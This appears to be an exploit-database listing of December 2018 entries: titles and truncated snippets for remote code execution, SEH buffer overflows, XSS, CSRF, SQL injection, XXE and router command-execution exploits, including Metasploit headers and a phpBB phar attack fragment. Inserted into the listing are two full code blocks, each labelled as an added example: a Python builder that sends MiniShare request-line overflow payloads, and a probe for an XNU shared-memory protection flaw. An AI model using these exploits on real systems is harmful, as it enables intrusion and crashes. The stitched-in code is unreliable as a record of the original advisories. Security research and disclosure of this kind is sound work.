Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'uri' class MetasploitModule 'Rukovoditel Project Management/CRM 2.3.1 - Authenticated Remote Code Execution', 'Description' = %q This module...
Bolt CMS < 3.6.2 - Cross-Site Scripting
Exploit Title: Bolt CMS https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip Affected Version: alert"Raif" Description Bolt CMS 3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry. PoC Video:...
Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)
Exploit Title: Admin Account take over Via CSRF Google Dork: N/A Date: 17-12-2018 Exploit Author: Sainadh Jamalpur Vendor Homepage: https://www.phpjabbers.com/hotel-booking-system/ Software Link: https://demo.phpjabbers.com/1545033057422/index.php?controller=pjAdmin&action=pjActionIndex Version:...
PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)
Exploit Title: PDF Explorer SEH Local Exploit Original Discovery:Gionathan "John" Reale DoS exploit Exploit Author: Achilles Date: 18-12-2018 Vendor Homepage: http://www.rttsoftware.com/ Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip Tested Version: 1.5.66.2 Tested on:...
IBM Operational Decision Manager 8.x - XML External Entity Injection
Exploit Title: XML External Entity Injection XXE Date: 2018-12-18 Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://www-01.ibm.com/support/docview.wss?uid=ibm10744149 Version: v8.6 - v8.7 - v8.8 - v8.9 REQUIRED Tested on: Windows 10 CVE : CVE-2018-1821 POC1: Port...
Integria IMS 5.0.83 - Cross-Site Request Forgery
Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery Exploit Author: Javier Olmedo Website: https://hackpuntes.com Date: 2018-12-19 Google Dork: N/A Vendor: Artica ST Software Link: https://github.com/articaST/integriaims Affected Version: 5.0.83 and possibly before Patched Version:...
PassFab RAR 9.3.2 - Buffer Overflow (SEH)
Exploit Title: PassFab RAR Password Recovery SEH Local Exploit Date: 16-12-2018 Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html Software Link: https://www.passfab.com/downloads/passfab-rar-password-recovery.exe Exploit Author: Achilles Tested Version: 9.3.2 Tested on:...
LanSpy 2.0.1.159 - Local Buffer Overflow
#!/usr/bin/python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow (RCE PoC) Date: 2018-12-16 Author: Juan Prescotto Tested Against: Win7 Pro SP1 64 bit Software...
Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting
Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting Exploit Author: Javier Olmedo Website: https://hackpuntes.com Date: 2018-12-18 Google Dork: N/A Vendor: Artica ST Software Link: https://github.com/articaST/integriaims Affected Version: 5.0.83 and possibly before Patched Version: 5.0.84...
AnyBurn 4.3 - Local Buffer Overflow (PoC)
Exploit Title: AnyBurn Date: 15-12-2018 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Author: Achilles Tested Version: 4.3 32-bit Tested on: Windows 7 x64 Vulnerability Type: Denial of Service DoS Local Buffer Overflow Steps to Produce th...
MegaPing - Local Buffer Overflow Denial of Service
Exploit Title: MegaPing Date: 15-12-2018 Vendor Homepage: http://www.magnetosoft.com/ Software Link: http://www.magnetosoft.com/downloads/win32/megapingsetup.exe Exploit Author: Achilles Tested Version: Tested on: Windows 7 x64 Vulnerability Type: Denial of Service DoS Local Buffer Overflow Steps...
Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write
function f0() {} function f1() { f2.prototype = arguments; new f2(); } function f2() { Array.prototype.sort.call(this, f0); } f1(1, 2, 3); <!-- ========================================================= Details: JsArrayFunctionHeapSort is called when sorting an array with a provided comparison function. One of its...
SDL Web Content Manager 8.5.0 - XML External Entity Injection
Author Information Author : Ahmed Elhady Mohamed twitter : @AhmedELhady Company : Canon Security Date : 25/11/2018 Software Information Affected Software : SDL Web Content Manager Version: Build 8.5.0 Vendor: SDL Tridion Software website : https://www.sdl.com CVE Number: CVE-2018-19371 Descriptio...
Excel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service
Exploit Title: Excel Password Recovery Professional Date: 15-12-2018 Vendor Homepage:https://www.recoverlostpassword.com/ Software Link :https://www.recoverlostpassword.com/downloads/excelpasswordrecoveryprotrial.exe Exploit Author: Achilles Tested Version: 8.2.0.0 Tested on: Windows 7 64...
Nsauditor 3.0.28.0 - Local SEH Buffer Overflow
Exploit Title: Nsauditor Local SEH Buffer Overflow Date: 15-12-2018 Vendor Homepage:http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Exploit Author: Achilles Tested Version: 3.0.28.0 Tested on: Windows XP SP3 1.- Run python code : Nsauditor.py 2.- Open...
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
Not only the GET method is vulnerable to BOF CVE-2004-2271. HEAD and POST methods are also vulnerable. The difference is minimal, both are exploited in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length ------------------------------------------------------------------- EAX...
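The one-byte difference noted above follows directly from the request line being copied as a whole: the saved return address sits at a fixed distance from the first byte of the line, so a longer method name leaves one byte less room for URI filler. The following is an added example, not code from the MiniShare advisory; the offset value and the return address bytes are placeholders chosen for illustration, not MiniShare's real values.

```python
# Added example (not from the MiniShare advisory): build a request-line
# overflow whose overwrite lands at the same absolute position for
# GET, HEAD and POST by shrinking the URI filler by len(method).
import socket
from typing import Dict

# Hypothetical distance from the first byte of the request line to the
# overwritten return address. Placeholder, not MiniShare's real offset.
EIP_OFFSET_FROM_LINE_START = 1787


def build_overflow_request(method: str, ret_addr: bytes,
                           eip_offset: int = EIP_OFFSET_FROM_LINE_START,
                           payload: bytes = b"\x90" * 16) -> bytes:
    """Return a raw HTTP request in which ret_addr begins exactly
    eip_offset bytes after the start of the request line, whatever
    the method. The filler is 'A' bytes so it never contains ret_addr."""
    prefix = method.encode() + b" "          # "GET " is 4 bytes, "HEAD " is 5
    pad_len = eip_offset - len(prefix)
    if pad_len < 0:
        raise ValueError("eip_offset is too small for method %r" % method)
    return prefix + b"A" * pad_len + ret_addr + payload + b" HTTP/1.1\r\n\r\n"


def overwrite_position(method: str, ret_addr: bytes = b"BBBB") -> int:
    """Absolute index of the overwrite value inside the raw request."""
    return build_overflow_request(method, ret_addr).index(ret_addr)


def uri_filler_lengths(ret_addr: bytes = b"BBBB") -> Dict[str, int]:
    """Per-method number of filler bytes in the URI. GET needs one more
    than HEAD or POST because its name is one character shorter."""
    lengths = {}
    for method in ("GET", "HEAD", "POST"):
        req = build_overflow_request(method, ret_addr)
        lengths[method] = req.index(ret_addr) - len(method) - 1   # minus method and space
    return lengths


def send_request(host: str, port: int, request: bytes, timeout: float = 5.0) -> None:
    """Deliver a built request to a test target (not called here)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
```

`uri_filler_lengths()` makes the relationship explicit: with the placeholder offset, GET gets 1783 filler bytes and HEAD and POST get 1782, while `overwrite_position()` is the same for all three.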
phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read
#!/usr/bin/env python # coding: utf8 import socket import asyncore import asynchat import struct import random import logging import logging.handlers PORT = 3306 log = logging.getLogger(__name__) log.setLevel(logging.DEBUG) tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')...
Google Chrome 70 - SQLite Magellan Crash (PoC)
This proof-of-concept crashes the Chrome renderer process using Tencent Blade Team's Magellan SQLite3 bug. It's based on a SQLite test case from the commit that fixed the bug. If you're using Chrome 70 or below, tap the button below to crash this page: Crash this page Your browser's user agent is...
Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution Dork: N/A Date: 2018-12-14 Exploit Author: Ihsan Sencan Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559 Version: 1.1 Category: Webapps Tested on:...
Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)
Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery Date: 2018-12-13 Exploit Author: Veyselxan Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?srank=38 Version: v1 REQUIRED Tested on: Linux 1 Poof Of...
Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure
Details ================ Software: Fortify SSC Software Security Center Version: 17.10, 17.20 & 18.10 Homepage: https://www.microfocus.com Advisory report: https://github.com/alt3kx/CVE-2018-7690 CVE: CVE-2018-7690 CVSS: 6.5 Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CWE-639 Description...
Facebook And Google Reviews System For Businesses 1.1 - SQL Injection
Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection Dork: N/A Date: 2018-12-14 Exploit Author: Ihsan Sencan Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559 Version: 1.1 Category: Webapps Tested on:...
Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)
Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit SEH Version: 24.15 Exploit Author: Manpreet Singh Kheberi Date: December 13 2018 Download Link: https://www.zortam.com/download.html Vendor Homepage: https://www.zortam.com Tested on: Windows Xp Sp3 x64 Type: Bind shell print...
Angry IP Scanner 3.5.3 - Denial of Service (PoC)
#!/usr/bin/python -*- coding: cp1252 -*- Exploit Title: Angry IP Scanner 3.5.3 Denial of Service PoC Author: Fernando Cruz Date: 13/12/2018 Vendor Homepage: https://angryip.org Tested Version: 3.11 Tested on Windows 10 Pro, 64-bit Steps to Produce the Crash: 1.- Run python code : python angryip.py 2...
Double Your Bitcoin Script Automatic - Authentication Bypass
Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass Date: 2018-12-08 Exploit Author: Veyselxan Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018 Version: v1 REQUIRED Tested on: Linux...
Huawei Router HG532e - Command Execution
#!/bin/python ''' Author : Rebellion Github : @rebe11ion Twitter : @rebellion ''' import urllib2, requests, os, sys from requests.auth import HTTPDigestAuth DEFAULT_HEADERS = {"User-Agent": "Mozilla"} DEFAULT_TIMEOUT = 5 def fetch_url(url): global DEFAULT_HEADERS, DEFAULT_TIMEOUT request = urllib2.Request(url...
Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)
Details ================ Software: Fortify SSC Software Security Center Version: 17.10, 17.20 & 18.10 Homepage: https://www.microfocus.com Advisory report: https://github.com/alt3kx/CVE-2018-7691 CVE: CVE-2018-7691 CVSS: 6.5 Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CWE-639 Description...
Responsive FileManager 9.13.4 - Multiple Vulnerabilities
Responsive FileManager 9.13.4 - Multiple Vulnerabilities Date: December 12, 2018 Author: farisv Vendor Homepage: https://www.responsivefilemanager.com/ Vulnerable Package Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.4/responsivefilemanager.zip Responsive FileManag...
Safari - Proxy Object Type Confusion (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Safari Proxy Object Type Confusion', 'Description' = %q This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The D...
UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)
Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service PoC and Pointer to next SEH and SE handler records overwrite Discovery by: Francisco Ramirez Discovery Date: 2018-12-14 Vendor Homepage: https://www.ultraiso.com/ Software Link : https://www.ultraiso.com/download.html Tested...
Cisco RV110W - Password Disclosure / Command Execution
#!/usr/bin/env python2 Cisco RV110W Password Disclosure and OS Command Execute. Tested on version: 1.1.0.9 maybe useable on 1.2.0.9 and later. Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute Date: 2018-08 Exploit Author: RySh Vendor Homepage: https://www.cisco.com/ Version:...
Linux - 'userfaultfd' Bypasses tmpfs File Permissions
Using the userfaultfd API, it is possible to first register a userfaultfd region for any VMA that fulfills vma_can_userfault(): it must be an anonymous VMA (vma->vm_ops == NULL), a hugetlb VMA (VM_HUGETLB), or a shmem VMA (vma->vm_ops == &shmem_vm_ops). This means that it is, for example, possible to register userfaultfd...
CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "CyberLink LabelPrint 2.5 Stack Buffer Overflow", 'Description' = %q This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and...
WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains
didBecomePrototype(); if (structure(vm)->hasMonoProto()) { DeferredStructureTransitionWatchpointFire deferred(vm, structure(vm)); Structure* newStructure = Structure::changePrototypeTransition(vm, structure(vm), prototype, deferred); setStructure(vm, newStructure); } else putDirect(vm, knownPolyProtoOffset, prototype); if...
phpBB 3.2.3 - Remote Code Execution
// All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var pluploadsalt = ''; var formtoken = ''; var creationtime = ''; var filepath = 'phar://./../files/plupload/$saltaaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5'evil.zip' = aaae9cba5fdadb1f0c384934cd20d11czip // you...
PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion
Exploit Author: bzyo CVE: CVE-2018-19936 Twitter: @bzyo Exploit Title: PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion Date: 12-07-18 Vulnerable Software: PrinterOn Enterprise 4.1.4 Vendor Homepage: https://www.printeron.com/ Version: 4.1.4 Tested On...
TP-Link wireless router Archer C1200 - Cross-Site Scripting
Unauthenticated + Author: Usman Saeed usman at xc0re.net + Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU · Impact: Client-side attacks are very common and are among the most frequent sources of user compromise. With this attack, the threat actor can steal cookies, redirect...
McAfee True Key - McAfee.TrueKey.Service Privilege Escalation
McAfee True Key: Multiple Issues with McAfee.TrueKey.Service Implementation Platform: Version 5.1.173.1 on Windows 10 1809. Class: Elevation of Privilege Summary: There are multiple issues in the implementation of the McAfee.TrueKey.Service which can result in privilege escalation through executi...
Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery
Exploit Title: Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery Add/Update Admin Dork: N/A Date: 2018-12-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/12825/alumni-tracer-sms-notification-using-phpmysqli.html Software Link:...
ZTE ZXHN H168N - Improper Access Restrictions
POC: CVE-2018-7357 and CVE-2018-7358 Disclaimer: This POC is for Educational Purposes , I would Not be responsible for any misuse of the information mentioned in this blog post + Unauthenticated + Author: Usman Saeed usman at xc0re.net + Protocol: UPnP + Affected Hardware/Software: Model name: ZXH...
Tourism Website Blog - Remote Code Execution / SQL Injection
Exploit Title: Tourism Website Blog - Remote Code Execution / SQL Injection Dork: N/A Date: 2018-12-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/12819/tourism-website-blog-faces-negros-web-application.html Software Link:...
XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection
When the mmap syscall is invoked on a POSIX shared memory segment (DTYPE_PSXSHM), pshm_mmap() maps the shared memory segment's pages into the address space of the calling process. It does this with the following code: int prot = uap->prot; ... if ((prot & PROT_WRITE) && ((fp->f_flag & FWRITE) == 0)) return (EPERM);...
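The check quoted above only guards the initial mmap() call: a descriptor opened without FWRITE cannot be mapped PROT_WRITE. The property that actually has to hold is that the mapping's maximum protection also excludes write, otherwise a later mprotect() can add PROT_WRITE to a read-only mapping. The following probe is an added example, not code from the XNU advisory; it maps a descriptor opened O_RDONLY as a shared read-only mapping and reports whether the kernel lets it be upgraded to writable. A page-sized temporary file stands in for a POSIX shm segment so the probe runs on any Unix; on macOS the same `readonly_fd_allows_write_upgrade()` can be handed a descriptor from shm_open() to check the behaviour the entry describes.

```python
# Added example (not from the XNU advisory): does a MAP_SHARED, PROT_READ
# mapping of an O_RDONLY descriptor accept mprotect(PROT_READ|PROT_WRITE)?
# A kernel that derives the mapping's max_prot from the open flags must
# refuse this with EACCES. libc is called through ctypes because Python's
# mmap module exposes no mprotect().
import ctypes
import mmap
import os
import tempfile

libc = ctypes.CDLL(None, use_errno=True)
libc.mmap.restype = ctypes.c_void_p
libc.mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int,
                      ctypes.c_int, ctypes.c_int, ctypes.c_long]
libc.mprotect.restype = ctypes.c_int
libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
libc.munmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t]

MAP_FAILED = ctypes.c_void_p(-1).value   # (void *)-1 as an unsigned address


def readonly_fd_allows_write_upgrade(fd: int, length: int) -> bool:
    """Map fd read-only and shared, then try to add PROT_WRITE.
    True  -> the upgrade was allowed (the incorrect maximum-protection
             behaviour the entry describes: a read-only descriptor became
             a writable shared mapping).
    False -> mprotect() was refused, as it should be (errno EACCES)."""
    addr = libc.mmap(None, length, mmap.PROT_READ, mmap.MAP_SHARED, fd, 0)
    if addr is None or addr == MAP_FAILED:
        raise OSError(ctypes.get_errno(), "mmap failed")
    try:
        rc = libc.mprotect(addr, length, mmap.PROT_READ | mmap.PROT_WRITE)
        return rc == 0
    finally:
        libc.munmap(addr, length)


def probe_tempfile() -> bool:
    """Stand-in for a POSIX shm segment: a page-sized temp file created
    writable, then reopened O_RDONLY before mapping. Returns the result
    of readonly_fd_allows_write_upgrade() for that read-only descriptor."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"\0" * mmap.PAGESIZE)
        os.close(fd)
        ro_fd = os.open(path, os.O_RDONLY)
        try:
            return readonly_fd_allows_write_upgrade(ro_fd, mmap.PAGESIZE)
        finally:
            os.close(ro_fd)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("write upgrade allowed:", probe_tempfile())
```

On a correct kernel `probe_tempfile()` returns False; a True result means the mapping's maximum protection did not reflect the read-only open, which is exactly the mprotect() path that the mmap-time FWRITE check alone does not cover.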
Huawei B315s-22 - Information Leak
Product Family: LTE Model B315s – 22 Firmware version: 21.318.01.00.26 Author: Usman Saeed usman at xc0re.net 1. Unauthenticated access to sensitive files: It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server. POC: By...
DomainMOD 4.11.01 - Cross-Site Scripting
Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting Date: 2018-11-22 Exploit Author: Mohammed Abdul Raheem Vendor Homepage: https://domainmod.org/ Software Link: https://github.com/DomainMod/DomainMod Version: v4.09.03 to v4.11.01 CVE : CVE-2018-19913 A Stored Cross-site...
SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)
# -*- coding: utf-8 -*- Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service PoC Date: 06/12/2018 Exploit Author: Alejandra Sánchez Vendor Homepage: https://www.smartftp.com/en-us/ Software Link: https://www.smartftp.com/get/SFTPMSI64.exe Version: 9.0.2623.0 Tested on: Windows Server 2016 x64/...
GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)
GNU inetutils <= 1.9.4 telnet.c multiple overflows ================================================== GNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment variable handling which can be exploited to escape restricted shells on embedded devices. Most modern...
WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection
Exploit Title: WP AutoSuggest 0.24 - SQL Injection Date: 01-12-2018 Software Link: https://wordpress.org/plugins/wp-autosuggest/ Exploit Author: Kaimi Website: https://kaimi.io Version: 0.24 Category: webapps SQL Injection File: autosuggest.php Vulnerable code: if (isset($_GET['wpas_keys'])) $wpas_keys =...
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
Exploit Title: ThinkPHP 5.x v5.0.23,v5.1.31 Remote Code Execution Date: 2018-12-11 Exploit Author: VulnSpy Vendor Homepage: https://thinkphp.cn Software Link: https://github.com/top-think/framework/ Version: v5.x below v5.0.23,v5.1.31 CVE: N/A Exploit...
Adobe ColdFusion 2018 - Arbitrary File Upload
Exploit Title: Unrestricted file upload in Adobe ColdFusion 2018 Google Dork: ext:cfm Date: 10-12-2018 Exploit Author: Pete Freitag of Foundeo Reversed: Vahagn vah13 Vardanian Vendor Homepage: adobe.com Version: 2018 Tested on: Adobe ColdFusion 2018 CVE : CVE-2018-15961 Comment: September 28, 201...
HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection
Exploit Title: SQL Injection in HotelDruid version 2.3 Google Dork: N/A Date: 9-12-2018 Exploit Author: Sainadh Jamalpur Vendor Homepage: http://www.hoteldruid.com Software Link: https://sourceforge.net/projects/hoteldruid/ Version: 2.3 REQUIRED Tested on: Windows x64/ Kali linux x64 CVE : N/A...